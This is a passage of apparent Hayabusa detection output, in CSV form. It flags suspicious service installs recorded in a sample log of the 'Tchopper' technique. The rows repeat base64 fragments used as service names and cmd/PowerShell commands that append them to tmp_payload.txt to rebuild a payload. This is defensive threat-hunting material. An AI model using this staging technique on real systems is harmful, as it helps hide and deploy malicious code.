tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:45.554 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgJE5ld2VzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLW1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICANCiAgICAgICAgICAgICRUb3RhbFRpbWUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:47.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: PSAoR2V0LURhdGUpLlN1YnRyYWN0KCRPbGRlc3RFdmVudFRpbWUpLlRvdGFsU2Vjb25kcw0KDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gJFRvdGFsTG9nRXZlbnRzIC8gJFRvdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:48.498 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FsVGltZSAgICAgICANCiAgICAgICAgDQogICAgICAgICAgICAkQXZnRXZlbnRzUGVyU2Vjb25kID0gW21hdGhdOjpSb3VuZCgkQXZnRXZlbnRzUGVyU2Vjb25kLCA1KSANCiAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg24"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:49.956 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgICMgUmVtb3RlIGJveA0KICAgICAgICBFbHNlIHsNCg0KICAgICAgICAgICAgaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg25"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:51.402 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:52.852 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:00.100 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 